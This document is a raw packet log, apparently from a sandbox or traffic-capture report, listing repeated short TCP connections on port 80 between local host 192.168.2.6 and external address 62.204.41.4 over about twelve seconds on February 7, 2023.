                          Feb 7, 2023 20:01:59.016139984 CET4996580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.076451063 CET804996562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.083553076 CET804996562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.083637953 CET4996580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.188110113 CET4996580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.189321041 CET4996680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.248569965 CET804996562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.248666048 CET4996580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.249706984 CET804996662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.249829054 CET4996680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.250310898 CET4996680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.312314987 CET804996662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.315323114 CET804996662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.315466881 CET4996680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.422607899 CET4996680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.423784018 CET4996780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.484474897 CET804996662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.484617949 CET4996680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.486471891 CET804996762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.486649990 CET4996780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.487215042 CET4996780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.551584959 CET804996762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.554467916 CET804996762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.554641008 CET4996780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.672955990 CET4996780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.673870087 CET4996880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.734532118 CET804996862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.734574080 CET804996762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.734826088 CET4996780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.735491991 CET4996880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.735491991 CET4996880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.796308994 CET804996862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.799014091 CET804996862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.799073935 CET4996880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.906352997 CET4996880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.908540964 CET4996980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.967128992 CET804996862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.967395067 CET4996880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.968873024 CET804996962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.969049931 CET4996980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.969580889 CET4996980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.029802084 CET804996962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.032289982 CET804996962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.032475948 CET4996980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.144305944 CET4996980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.145375967 CET4997080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.204688072 CET804996962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.204880953 CET4996980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.205806971 CET804997062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.205976009 CET4997080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.209992886 CET4997080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.270606041 CET804997062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.275804043 CET804997062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.275935888 CET4997080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.396598101 CET4997080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.397881985 CET4997180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.457197905 CET804997162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.457308054 CET804997062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.457397938 CET4997180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.457443953 CET4997080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.459434032 CET4997180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.518680096 CET804997162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.521142960 CET804997162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.521307945 CET4997180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.642389059 CET4997180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.643554926 CET4997380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.701919079 CET804997162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.702042103 CET4997180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.703813076 CET804997362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.703927040 CET4997380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.704663992 CET4997380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.766530037 CET804997362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.768744946 CET804997362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.768862009 CET4997380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.880254984 CET4997380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.881190062 CET4997480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.941603899 CET804997362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.941832066 CET4997380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.944438934 CET804997462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:00.944621086 CET4997480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:00.945241928 CET4997480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.007723093 CET804997462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.010104895 CET804997462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.010253906 CET4997480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.126602888 CET4997480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.127619982 CET4997580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.188180923 CET804997562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.189074039 CET804997462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.189238071 CET4997480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.189245939 CET4997580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.204511881 CET4997580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.265125990 CET804997562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.269857883 CET804997562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.269974947 CET4997580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.376391888 CET4997580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.378160000 CET4997680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.437252998 CET804997562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.437455893 CET4997580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.440541029 CET804997662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.441303968 CET4997680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.442059994 CET4997680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.504507065 CET804997662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.507285118 CET804997662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.507447958 CET4997680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.641171932 CET4997680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.642198086 CET4997780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.703576088 CET804997762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.703608036 CET804997662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.703826904 CET4997680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.709410906 CET4997780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.710756063 CET4997780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.772690058 CET804997762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.775300980 CET804997762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.775417089 CET4997780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.895601034 CET4997780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.896821976 CET4997880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.961057901 CET804997762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.961528063 CET4997780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.962186098 CET804997862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:01.962338924 CET4997880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:01.964464903 CET4997880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.026784897 CET804997862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.029624939 CET804997862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.029800892 CET4997880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.141002893 CET4997880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.145124912 CET4997980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.205465078 CET804997862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.205693007 CET4997880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.206500053 CET804997962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.206850052 CET4997980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.207617998 CET4997980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.268624067 CET804997962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.273052931 CET804997962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.277627945 CET4997980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.402184963 CET4997980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.403506994 CET4998080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.461359978 CET804997962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.461622953 CET4997980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.463747025 CET804998062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.464071035 CET4998080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.464632988 CET4998080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.524935007 CET804998062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.527991056 CET804998062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.529639006 CET4998080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.640799046 CET4998080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.641726971 CET4998180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.701258898 CET804998062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.701541901 CET4998080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.701900959 CET804998162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.702045918 CET4998180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.719021082 CET4998180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.779495955 CET804998162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.783189058 CET804998162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.783495903 CET4998180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.890815020 CET4998180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.891844034 CET4998280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.951215029 CET804998162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.951316118 CET4998180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.952229023 CET804998262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:02.952507973 CET4998280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:02.953057051 CET4998280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.013508081 CET804998262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.016334057 CET804998262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.016511917 CET4998280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.127022028 CET4998280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.128309011 CET4998380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.188684940 CET804998262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.188879013 CET4998280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.189397097 CET804998362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.189564943 CET4998380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.190207005 CET4998380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.254201889 CET804998362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.259171963 CET804998362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.259371996 CET4998380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.378369093 CET4998380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.379096031 CET4998480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.439584970 CET804998462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.439615011 CET804998362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.439768076 CET4998380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.439784050 CET4998480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.441087008 CET4998480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.501652002 CET804998462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.505045891 CET804998462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.505194902 CET4998480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.609083891 CET4998480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.609915972 CET4998580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.670523882 CET804998462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.670757055 CET4998480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.671158075 CET804998562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.671288013 CET4998580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.672174931 CET4998580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.732675076 CET804998562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.735590935 CET804998562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.735780954 CET4998580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.843825102 CET4998580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.844921112 CET4998680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.904448986 CET804998562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.904678106 CET4998580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.907713890 CET804998662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.907975912 CET4998680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.914623976 CET4998680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:03.979494095 CET804998662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.981905937 CET804998662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:03.981982946 CET4998680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.094052076 CET4998680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.095129013 CET4998780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.154846907 CET804998762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.155025959 CET4998780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.156256914 CET804998662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.156363010 CET4998680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.169863939 CET4998780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.229386091 CET804998762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.233376026 CET804998762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.233457088 CET4998780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.345220089 CET4998780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.348925114 CET4998880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.404921055 CET804998762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.405054092 CET4998780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.409257889 CET804998862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.409612894 CET4998880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.410732031 CET4998880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.473036051 CET804998862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.476504087 CET804998862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.476613045 CET4998880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.631584883 CET4998880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:04.691997051 CET804998862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:04.692143917 CET4998880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.007635117 CET4998980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.068902016 CET804998962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.071870089 CET4998980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.120373964 CET4998980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.182590008 CET804998962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.187333107 CET804998962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.187417984 CET4998980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.299154997 CET4998980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.300163031 CET4999080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.358903885 CET804998962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.359905958 CET4998980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.360503912 CET804999062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.360663891 CET4999080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.389457941 CET4999080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.449801922 CET804999062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.453105927 CET804999062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.456588030 CET4999080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.658864021 CET4999080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.659878016 CET4999180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.720299959 CET804999062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.720633984 CET4999080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.721410036 CET804999162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.721525908 CET4999180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.764040947 CET4999180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:05.825238943 CET804999162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.828155994 CET804999162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:05.828948975 CET4999180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.483366966 CET4999180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.484304905 CET4999280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.544418097 CET804999162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:06.544656038 CET4999180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.548005104 CET804999262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:06.548270941 CET4999280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.575938940 CET4999280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.638767958 CET804999262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:06.642028093 CET804999262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:06.642246962 CET4999280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.905981064 CET4999280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.970726967 CET804999262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:06.970949888 CET4999280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:06.974275112 CET4999380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:07.034881115 CET804999362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:07.035103083 CET4999380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:07.121548891 CET4999380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:07.182153940 CET804999362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:07.187078953 CET804999362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:07.187280893 CET4999380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.015722990 CET4999380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.016853094 CET4999480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.076206923 CET804999362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.076442003 CET4999380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.077694893 CET804999462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.077873945 CET4999480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.136023998 CET4999480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.196660042 CET804999462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.200330019 CET804999462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.200546980 CET4999480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.592603922 CET4999480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.594010115 CET4999580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.653371096 CET804999462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.653592110 CET4999480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.656457901 CET804999562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.656666040 CET4999580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.662326097 CET4999580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.725275993 CET804999562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.728123903 CET804999562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.728337049 CET4999580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.847222090 CET4999580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.848057985 CET4999680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.908611059 CET804999662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.908822060 CET4999680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.909681082 CET804999562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.909792900 CET4999580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.912451982 CET4999680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:09.973149061 CET804999662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.978259087 CET804999662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:09.978410959 CET4999680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.106373072 CET4999680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.107345104 CET4999780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.166929960 CET804999662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.167121887 CET4999680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.168606997 CET804999762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.168793917 CET4999780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.169392109 CET4999780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.230643034 CET804999762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.236095905 CET804999762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.236311913 CET4999780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.345364094 CET4999780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.348507881 CET4999880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.406939983 CET804999762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.407170057 CET4999780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.409060955 CET804999862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.409261942 CET4999880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.416841030 CET4999880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.477741957 CET804999862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.481199980 CET804999862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.481367111 CET4999880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.597229004 CET4999880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.598385096 CET4999980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.657828093 CET804999862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.657949924 CET4999880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.658759117 CET804999962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.658912897 CET4999980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.659482956 CET4999980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.719894886 CET804999962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.723718882 CET804999962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.723948956 CET4999980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.829675913 CET4999980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.830796957 CET5000080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.890386105 CET804999962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.890583992 CET4999980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.892244101 CET805000062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.892432928 CET5000080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.893167019 CET5000080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:10.954499960 CET805000062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.958776951 CET805000062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:10.958971024 CET5000080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.077080965 CET5000080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.091622114 CET5000180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.138776064 CET805000062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.138942003 CET5000080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.153242111 CET805000162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.153403997 CET5000180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.159822941 CET5000180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.221426964 CET805000162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.227298975 CET805000162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.227567911 CET5000180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.344810009 CET5000180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.345769882 CET5000280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.405606031 CET805000262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.405982018 CET5000280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.406250954 CET805000162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.406351089 CET5000180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.408989906 CET5000280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.468689919 CET805000262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.471474886 CET805000262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.471662045 CET5000280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.582572937 CET5000280192.168.2.662.204.41.4
